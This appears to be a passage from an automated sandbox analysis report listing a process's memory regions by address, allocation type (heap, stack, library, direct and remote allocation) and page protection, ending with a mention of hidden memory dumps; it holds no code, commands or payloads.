page read and write
|
||
|
22DDB000
|
stack
|
page read and write
|
||
|
7FF886E70000
|
trusted library allocation
|
page read and write
|
||
|
22D0E000
|
stack
|
page read and write
|
||
|
29180E0D000
|
trusted library allocation
|
page read and write
|
||
|
8A7C000
|
direct allocation
|
page execute and read and write
|
||
|
7FF886E30000
|
trusted library allocation
|
page read and write
|
||
|
29181F1B000
|
trusted library allocation
|
page read and write
|
||
|
3E0000
|
heap
|
page read and write
|
||
|
424F000
|
stack
|
page read and write
|
||
|
7FF886C50000
|
trusted library allocation
|
page execute and read and write
|
||
|
7CB0000
|
trusted library allocation
|
page read and write
|
||
|
291987E1000
|
heap
|
page read and write
|
||
|
24903B91000
|
heap
|
page read and write
|
||
|
29181E9C000
|
trusted library allocation
|
page read and write
|
||
|
7473000
|
heap
|
page read and write
|
||
|
24901DF0000
|
heap
|
page read and write
|
||
|
68DD000
|
stack
|
page read and write
|
||
|
61CC000
|
remote allocation
|
page execute and read and write
|
||
|
24903B91000
|
heap
|
page read and write
|
||
|
291800D7000
|
heap
|
page execute and read and write
|
||
|
3D0000
|
heap
|
page read and write
|
||
|
F2B047E000
|
stack
|
page read and write
|
||
|
24901DE3000
|
heap
|
page read and write
|
||
|
7FF886E50000
|
trusted library allocation
|
page read and write
|
||
|
7237000
|
heap
|
page read and write
|
||
|
549B000
|
trusted library allocation
|
page read and write
|
||
|
24901DE3000
|
heap
|
page read and write
|
||
|
7150000
|
trusted library allocation
|
page read and write
|
||
|
7FC3000
|
heap
|
page read and write
|
||
|
7FF886CD0000
|
trusted library allocation
|
page read and write
|
||
|
57CC000
|
remote allocation
|
page execute and read and write
|
||
|
24901DCA000
|
heap
|
page read and write
|
||
|
24903B84000
|
heap
|
page read and write
|
||
|
7FF886BEC000
|
trusted library allocation
|
page execute and read and write
|
||
|
5491000
|
trusted library allocation
|
page read and write
|
||
|
29180050000
|
heap
|
page readonly
|
||
|
7CE0000
|
trusted library allocation
|
page read and write
|
||
|
24903BC0000
|
heap
|
page read and write
|
||
|
7FF886BF0000
|
trusted library allocation
|
page execute and read and write
|
||
|
43A5000
|
heap
|
page execute and read and write
|
||
|
7FF886B30000
|
trusted library allocation
|
page read and write
|
||
|
969000
|
trusted library allocation
|
page read and write
|
||
|
6C20000
|
heap
|
page read and write
|
||
|
7FF886B40000
|
trusted library allocation
|
page read and write
|
||
|
910000
|
heap
|
page read and write
|
||
|
7FF886D50000
|
trusted library allocation
|
page read and write
|
||
|
29180457000
|
trusted library allocation
|
page read and write
|
||
|
24901DD7000
|
heap
|
page read and write
|
||
|
7FF886E60000
|
trusted library allocation
|
page read and write
|
||
|
4491000
|
trusted library allocation
|
page read and write
|
||
|
291FE533000
|
heap
|
page read and write
|
||
|
7FF886EB0000
|
trusted library allocation
|
page read and write
|
||
|
820000
|
heap
|
page read and write
|
||
|
71F0000
|
heap
|
page read and write
|
||
|
2297E000
|
stack
|
page read and write
|
||
|
745A000
|
heap
|
page read and write
|
||
|
83B0000
|
direct allocation
|
page read and write
|
||
|
78A5FFE000
|
stack
|
page read and write
|
||
|
24901CD0000
|
heap
|
page read and write
|
||
|
7CD0000
|
trusted library allocation
|
page read and write
|
||
|
2919897F000
|
heap
|
page read and write
|
||
|
29198780000
|
heap
|
page execute and read and write
|
||
|
291FE6D0000
|
heap
|
page read and write
|
||
|
7FF886CEA000
|
trusted library allocation
|
page read and write
|
||
|
7CA0000
|
trusted library allocation
|
page read and write
|
||
|
74BF000
|
heap
|
page read and write
|
||
|
29181FBD000
|
trusted library allocation
|
page read and write
|
||
|
8300000
|
direct allocation
|
page read and write
|
||
|
22A2E000
|
stack
|
page read and write
|
||
|
87F000
|
stack
|
page read and write
|
||
|
43A0000
|
heap
|
page execute and read and write
|
||
|
3F0000
|
heap
|
page read and write
|
||
|
8230000
|
trusted library allocation
|
page read and write
|
||
|
7465000
|
heap
|
page read and write
|
||
|
29181EA8000
|
trusted library allocation
|
page read and write
|
||
|
42EE000
|
stack
|
page read and write
|
||
|
745E000
|
heap
|
page read and write
|
||
|
54A1000
|
trusted library allocation
|
page read and write
|
||
|
29181E99000
|
trusted library allocation
|
page read and write
|
||
|
F2B08BF000
|
stack
|
page read and write
|
||
|
29198972000
|
heap
|
page read and write
|
||
|
960000
|
trusted library allocation
|
page read and write
|
||
|
22CD0000
|
remote allocation
|
page read and write
|
||
|
83A0000
|
direct allocation
|
page read and write
|
||
|
358000
|
stack
|
page read and write
|
||
|
73AE000
|
unkown
|
page read and write
|
||
|
291806B2000
|
trusted library allocation
|
page read and write
|
||
|
24903B60000
|
heap
|
page read and write
|
||
|
6960000
|
direct allocation
|
page read and write
|
||
|
F2B0C3E000
|
stack
|
page read and write
|
||
|
24903CE0000
|
heap
|
page read and write
|
||
|
9F0000
|
heap
|
page readonly
|
||
|
24901CE0000
|
heap
|
page read and write
|
||
|
22460000
|
direct allocation
|
page read and write
|
||
|
22B7C000
|
stack
|
page read and write
|
||
|
29180728000
|
trusted library allocation
|
page read and write
|
||
|
9EE000
|
stack
|
page read and write
|
||
|
6ADE000
|
stack
|
page read and write
|
||
|
7FF886BE0000
|
trusted library allocation
|
page read and write
|
||
|
22B3D000
|
stack
|
page read and write
|
||
|
24903B78000
|
heap
|
page read and write
|
||
|
F2B0CBC000
|
stack
|
page read and write
|
||
|
291FE4CC000
|
heap
|
page read and write
|
||
|
24903B6B000
|
heap
|
page read and write
|
||
|
F2B09B7000
|
stack
|
page read and write
|
||
|
291FE735000
|
heap
|
page read and write
|
||
|
24901D2C000
|
heap
|
page read and write
|
||
|
9A0000
|
trusted library allocation
|
page read and write
|
||
|
6DFD000
|
heap
|
page read and write
|
||
|
6920000
|
direct allocation
|
page read and write
|
||
|
7130000
|
trusted library allocation
|
page read and write
|
||
|
8260000
|
trusted library allocation
|
page read and write
|
||
|
22DF0000
|
heap
|
page read and write
|
||
|
29190251000
|
trusted library allocation
|
page read and write
|
||
|
29180231000
|
trusted library allocation
|
page read and write
|
||
|
820C000
|
stack
|
page read and write
|
||
|
24901D31000
|
heap
|
page read and write
|
||
|
8FF000
|
stack
|
page read and write
|
||
|
224A0000
|
direct allocation
|
page read and write
|
||
|
291806D5000
|
trusted library allocation
|
page read and write
|
||
|
4330000
|
heap
|
page read and write
|
||
|
7110000
|
trusted library allocation
|
page read and write
|
||
|
291FE490000
|
heap
|
page read and write
|
||
|
7474000
|
heap
|
page read and write
|
||
|
291FE4A0000
|
heap
|
page read and write
|
||
|
7FDD000
|
heap
|
page read and write
|
||
|
29181E81000
|
trusted library allocation
|
page read and write
|
||
|
F2B0ABF000
|
stack
|
page read and write
|
||
|
74D000
|
heap
|
page read and write
|
||
|
7BC0000
|
trusted library allocation
|
page read and write
|
||
|
24901F10000
|
heap
|
page read and write
|
||
|
947C000
|
direct allocation
|
page execute and read and write
|
||
|
7CF0000
|
heap
|
page read and write
|
||
|
29198234000
|
heap
|
page read and write
|
||
|
7D10000
|
trusted library allocation
|
page read and write
|
||
|
7F94000
|
heap
|
page read and write
|
||
|
6D4E000
|
stack
|
page read and write
|
||
|
24901DF6000
|
heap
|
page read and write
|
||
|
2919052E000
|
trusted library allocation
|
page read and write
|
||
|
6EB0000
|
heap
|
page execute and read and write
|
||
|
24903CFA000
|
heap
|
page read and write
|
||
|
F2B057E000
|
stack
|
page read and write
|
||
|
7C80000
|
trusted library allocation
|
page execute and read and write
|
||
|
980000
|
trusted library allocation
|
page read and write
|
||
|
291FE4EC000
|
heap
|
page read and write
|
||
|
24903B72000
|
heap
|
page read and write
|
||
|
6950000
|
direct allocation
|
page read and write
|
||
|
70CE000
|
stack
|
page read and write
|
||
|
24903B61000
|
heap
|
page read and write
|
||
|
22BC0000
|
heap
|
page read and write
|
||
|
7BD0000
|
trusted library allocation
|
page read and write
|
||
|
7D95000
|
trusted library allocation
|
page read and write
|
||
|
8BE000
|
stack
|
page read and write
|
||
|
7140000
|
trusted library allocation
|
page read and write
|
||
|
6E89000
|
heap
|
page read and write
|
||
|
78A59FE000
|
stack
|
page read and write
|
||
|
6E75000
|
heap
|
page read and write
|
||
|
42F0000
|
trusted library allocation
|
page execute and read and write
|
||
|
83E0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF886E20000
|
trusted library allocation
|
page read and write
|
||
|
7FF886B34000
|
trusted library allocation
|
page read and write
|
||
|
4D78000
|
trusted library allocation
|
page read and write
|
||
|
7FB0000
|
heap
|
page read and write
|
||
|
24901D63000
|
heap
|
page read and write
|
||
|
73F0000
|
heap
|
page read and write
|
||
|
8270000
|
direct allocation
|
page read and write
|
||
|
BC7C000
|
direct allocation
|
page execute and read and write
|
||
|
74BC000
|
heap
|
page read and write
|
||
|
78A62FB000
|
stack
|
page read and write
|
||
|
78A5BFF000
|
stack
|
page read and write
|
||
|
7FF886B4B000
|
trusted library allocation
|
page read and write
|
||
|
7FF886D40000
|
trusted library allocation
|
page read and write
|
||
|
2287E000
|
stack
|
page read and write
|
||
|
7200000
|
heap
|
page readonly
|
||
|
31C000
|
stack
|
page read and write
|
||
|
8390000
|
direct allocation
|
page read and write
|
||
|
7FF886D17000
|
trusted library allocation
|
page read and write
|
||
|
81CE000
|
stack
|
page read and write
|
||
|
29180040000
|
trusted library allocation
|
page read and write
|
||
|
29190240000
|
trusted library allocation
|
page read and write
|
||
|
29180160000
|
heap
|
page execute and read and write
|
||
|
291806A8000
|
trusted library allocation
|
page read and write
|
||
|
24902050000
|
heap
|
page read and write
|
||
|
985000
|
trusted library allocation
|
page execute and read and write
|
||
|
24901DD3000
|
heap
|
page read and write
|
||
|
291800D0000
|
heap
|
page execute and read and write
|
||
|
24901D69000
|
heap
|
page read and write
|
||
|
2919894A000
|
heap
|
page read and write
|
||
|
8210000
|
trusted library allocation
|
page read and write
|
||
|
7FF886B3D000
|
trusted library allocation
|
page execute and read and write
|
||
|
24901DD7000
|
heap
|
page read and write
|
||
|
442E000
|
stack
|
page read and write
|
||
|
24903B91000
|
heap
|
page read and write
|
||
|
2919897A000
|
heap
|
page read and write
|
||
|
24901D69000
|
heap
|
page read and write
|
||
|
71C0000
|
trusted library allocation
|
page read and write
|
||
|
29181ED9000
|
trusted library allocation
|
page read and write
|
||
|
6B1B000
|
stack
|
page read and write
|
||
|
24903CF0000
|
heap
|
page read and write
|
||
|
7D00000
|
trusted library allocation
|
page read and write
|
||
|
24901D70000
|
heap
|
page read and write
|
||
|
24903BC1000
|
heap
|
page read and write
|
||
|
7170000
|
trusted library allocation
|
page read and write
|
||
|
7E9C000
|
stack
|
page read and write
|
||
|
747B000
|
heap
|
page read and write
|
||
|
7FF886DA0000
|
trusted library allocation
|
page read and write
|
||
|
29198680000
|
heap
|
page read and write
|
||
|
708E000
|
stack
|
page read and write
|
||
|
24901DF9000
|
heap
|
page read and write
|
||
|
24901DED000
|
heap
|
page read and write
|
||
|
7FF886D15000
|
trusted library allocation
|
page read and write
|
||
|
291987C0000
|
heap
|
page read and write
|
||
|
22490000
|
direct allocation
|
page read and write
|
||
|
F2B0936000
|
stack
|
page read and write
|
||
|
7EE0000
|
heap
|
page read and write
|
||
|
F2B04FE000
|
stack
|
page read and write
|
||
|
29180060000
|
trusted library allocation
|
page read and write
|
||
|
800F000
|
heap
|
page read and write
|
||
|
24903CE6000
|
heap
|
page read and write
|
||
|
228BF000
|
stack
|
page read and write
|
||
|
78A61FE000
|
stack
|
page read and write
|
||
|
29181EA4000
|
trusted library allocation
|
page read and write
|
||
|
24903B7B000
|
heap
|
page read and write
|
||
|
71B0000
|
trusted library allocation
|
page read and write
|
||
|
22A6F000
|
stack
|
page read and write
|
||
|
6E6D000
|
heap
|
page read and write
|
||
|
7FF886D60000
|
trusted library allocation
|
page read and write
|
||
|
7F80000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FDA0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FF886E80000
|
trusted library allocation
|
page read and write
|
||
|
73EF000
|
unkown
|
page read and write
|
||
|
7290000
|
heap
|
page read and write
|
||
|
7FF886E10000
|
trusted library allocation
|
page read and write
|
||
|
71D0000
|
trusted library allocation
|
page read and write
|
||
|
8240000
|
trusted library allocation
|
page read and write
|
||
|
229BE000
|
stack
|
page read and write
|
||
|
7FE5000
|
heap
|
page read and write
|
||
|
22480000
|
direct allocation
|
page read and write
|
||
|
6F01000
|
heap
|
page read and write
|
||
|
24901D08000
|
heap
|
page read and write
|
||
|
291800E0000
|
trusted library allocation
|
page read and write
|
||
|
F2B067C000
|
stack
|
page read and write
|
||
|
24901D00000
|
heap
|
page read and write
|
||
|
4310000
|
heap
|
page read and write
|
||
|
7180000
|
trusted library allocation
|
page read and write
|
||
|
7295000
|
heap
|
page read and write
|
||
|
24901DDA000
|
heap
|
page read and write
|
||
|
982000
|
trusted library allocation
|
page read and write
|
||
|
7FF886DB0000
|
trusted library allocation
|
page read and write
|
||
|
24903B74000
|
heap
|
page read and write
|
||
|
24901DCA000
|
heap
|
page read and write
|
||
|
8D0F000
|
stack
|
page read and write
|
||
|
22420000
|
direct allocation
|
page read and write
|
||
|
22D4F000
|
stack
|
page read and write
|
||
|
7FF886DF0000
|
trusted library allocation
|
page read and write
|
||
|
24903CA0000
|
heap
|
page read and write
|
||
|
78A58FE000
|
stack
|
page read and write
|
||
|
24901DE9000
|
heap
|
page read and write
|
||
|
22FD0000
|
heap
|
page read and write
|
||
|
7F90000
|
heap
|
page read and write
|
||
|
4300000
|
trusted library allocation
|
page read and write
|
||
|
24901DCA000
|
heap
|
page read and write
|
||
|
7FF886B32000
|
trusted library allocation
|
page read and write
|
||
|
F2B0B3E000
|
stack
|
page read and write
|
||
|
6E1D000
|
heap
|
page read and write
|
||
|
6DB0000
|
heap
|
page read and write
|
||
|
24901DDB000
|
heap
|
page read and write
|
||
|
291806BC000
|
trusted library allocation
|
page read and write
|
||
|
24903B64000
|
heap
|
page read and write
|
||
|
F2B06FE000
|
stack
|
page read and write
|
||
|
24901D30000
|
heap
|
page read and write
|
||
|
7CC0000
|
trusted library allocation
|
page read and write
|
||
|
7FF886D80000
|
trusted library allocation
|
page read and write
|
||
|
7FF886BE6000
|
trusted library allocation
|
page read and write
|
||
|
954000
|
trusted library allocation
|
page read and write
|
||
|
7FF886DD0000
|
trusted library allocation
|
page read and write
|
||
|
6980000
|
direct allocation
|
page read and write
|
||
|
29180788000
|
trusted library allocation
|
page read and write
|
||
|
29180220000
|
heap
|
page read and write
|
||
|
2919891C000
|
heap
|
page read and write
|
||
|
24901DCC000
|
heap
|
page read and write
|
||
|
7C90000
|
heap
|
page read and write
|
||
|
45E8000
|
trusted library allocation
|
page read and write
|
||
|
24903CF3000
|
heap
|
page read and write
|
||
|
291FE730000
|
heap
|
page read and write
|
||
|
22CD0000
|
remote allocation
|
page read and write
|
||
|
89A0000
|
direct allocation
|
page execute and read and write
|
||
|
7FF886EC0000
|
trusted library allocation
|
page read and write
|
||
|
920000
|
heap
|
page read and write
|
||
|
24903CF0000
|
heap
|
page read and write
|
||
|
747B000
|
heap
|
page read and write
|
||
|
29180090000
|
trusted library allocation
|
page read and write
|
||
|
7FF886D30000
|
trusted library allocation
|
page read and write
|
||
|
291FE690000
|
heap
|
page read and write
|
||
|
78A5CFE000
|
stack
|
page read and write
|
||
|
7210000
|
heap
|
page read and write
|
||
|
22470000
|
direct allocation
|
page read and write
|
||
|
24901ED0000
|
heap
|
page read and write
|
||
|
740000
|
heap
|
page read and write
|
||
|
7DF460490000
|
trusted library allocation
|
page execute and read and write
|
||
|
7EDC000
|
stack
|
page read and write
|
||
|
24901D69000
|
heap
|
page read and write
|
||
|
24903B8C000
|
heap
|
page read and write
|
||
|
7FF886E40000
|
trusted library allocation
|
page read and write
|
||
|
900000
|
trusted library section
|
page read and write
|
||
|
24903CF8000
|
heap
|
page read and write
|
||
|
8CCD000
|
stack
|
page read and write
|
||
|
7FF886EA0000
|
trusted library allocation
|
page read and write
|
||
|
24901D40000
|
heap
|
page read and write
|
||
|
7FF886D70000
|
trusted library allocation
|
page read and write
|
||
|
446E000
|
stack
|
page read and write
|
||
|
78A558A000
|
stack
|
page read and write
|
||
|
291FE4E5000
|
heap
|
page read and write
|
||
|
F2B07FE000
|
stack
|
page read and write
|
||
|
7474000
|
heap
|
page read and write
|
||
|
24903B87000
|
heap
|
page read and write
|
||
|
940000
|
trusted library allocation
|
page read and write
|
||
|
7260000
|
direct allocation
|
page read and write
|
||
|
7C3D000
|
stack
|
page read and write
|
||
|
29181F2E000
|
trusted library allocation
|
page read and write
|
||
|
7160000
|
trusted library allocation
|
page read and write
|
||
|
24903B91000
|
heap
|
page read and write
|
||
|
24901D41000
|
heap
|
page read and write
|
||
|
7BB0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7D0B000
|
trusted library allocation
|
page read and write
|
||
|
22AEE000
|
stack
|
page read and write
|
||
|
7280000
|
direct allocation
|
page read and write
|
||
|
680E000
|
stack
|
page read and write
|
||
|
691B000
|
stack
|
page read and write
|
||
|
95D000
|
trusted library allocation
|
page execute and read and write
|
||
|
6FF8000
|
trusted library allocation
|
page read and write
|
||
|
24901D63000
|
heap
|
page read and write
|
||
|
291FE506000
|
heap
|
page read and write
|
||
|
228FE000
|
stack
|
page read and write
|
||
|
24901D92000
|
heap
|
page read and write
|
||
|
746A000
|
heap
|
page read and write
|
||
|
291988D6000
|
heap
|
page read and write
|
||
|
6D8E000
|
stack
|
page read and write
|
||
|
22AAD000
|
stack
|
page read and write
|
||
|
24901DFB000
|
heap
|
page read and write
|
||
|
54B9000
|
trusted library allocation
|
page read and write
|
||
|
291FFF60000
|
heap
|
page read and write
|
||
|
291FE4B8000
|
heap
|
page read and write
|
||
|
7230000
|
heap
|
page read and write
|
||
|
29180DD1000
|
trusted library allocation
|
page read and write
|
||
|
24903CE1000
|
heap
|
page read and write
|
||
|
29182123000
|
trusted library allocation
|
page read and write
|
||
|
2919051F000
|
trusted library allocation
|
page read and write
|
||
|
29198CB0000
|
heap
|
page read and write
|
||
|
F2B0A39000
|
stack
|
page read and write
|
||
|
2918180D000
|
trusted library allocation
|
page read and write
|
||
|
4258000
|
trusted library allocation
|
page read and write
|
||
|
24901D31000
|
heap
|
page read and write
|
||
|
7FF886C16000
|
trusted library allocation
|
page execute and read and write
|
||
|
A87C000
|
direct allocation
|
page execute and read and write
|
||
|
78A60FE000
|
stack
|
page read and write
|
||
|
29180E00000
|
trusted library allocation
|
page read and write
|
||
|
73FA000
|
heap
|
page read and write
|
||
|
2919873B000
|
heap
|
page read and write
|
||
|
6DD3000
|
heap
|
page read and write
|
||
|
291FFF65000
|
heap
|
page read and write
|
||
|
2293E000
|
stack
|
page read and write
|
||
|
7190000
|
trusted library allocation
|
page read and write
|
||
|
6970000
|
direct allocation
|
page read and write
|
||
|
6E6B000
|
heap
|
page read and write
|
||
|
42AC000
|
stack
|
page read and write
|
||
|
22CD0000
|
remote allocation
|
page read and write
|
||
|
29198759000
|
heap
|
page read and write
|
||
|
437E000
|
stack
|
page read and write
|
||
|
7FF886D90000
|
trusted library allocation
|
page read and write
|
||
|
7120000
|
trusted library allocation
|
page read and write
|
||
|
291802B6000
|
trusted library allocation
|
page read and write
|
||
|
291FE670000
|
heap
|
page read and write
|
||
|
38F0000
|
remote allocation
|
page execute and read and write
|
||
|
7C7E000
|
stack
|
page read and write
|
||
|
2918072C000
|
trusted library allocation
|
page read and write
|
||
|
7270000
|
direct allocation
|
page read and write
|
||
|
29181F17000
|
trusted library allocation
|
page read and write
|
||
|
6DED000
|
heap
|
page read and write
|
||
|
291808F8000
|
trusted library allocation
|
page read and write
|
||
|
7F3E000
|
stack
|
page read and write
|
||
|
24903CC2000
|
heap
|
page read and write
|
||
|
78A5EFD000
|
stack
|
page read and write
|
||
|
291806C0000
|
trusted library allocation
|
page read and write
|
||
|
747B000
|
heap
|
page read and write
|
There are 482 hidden memdumps, click here to show them.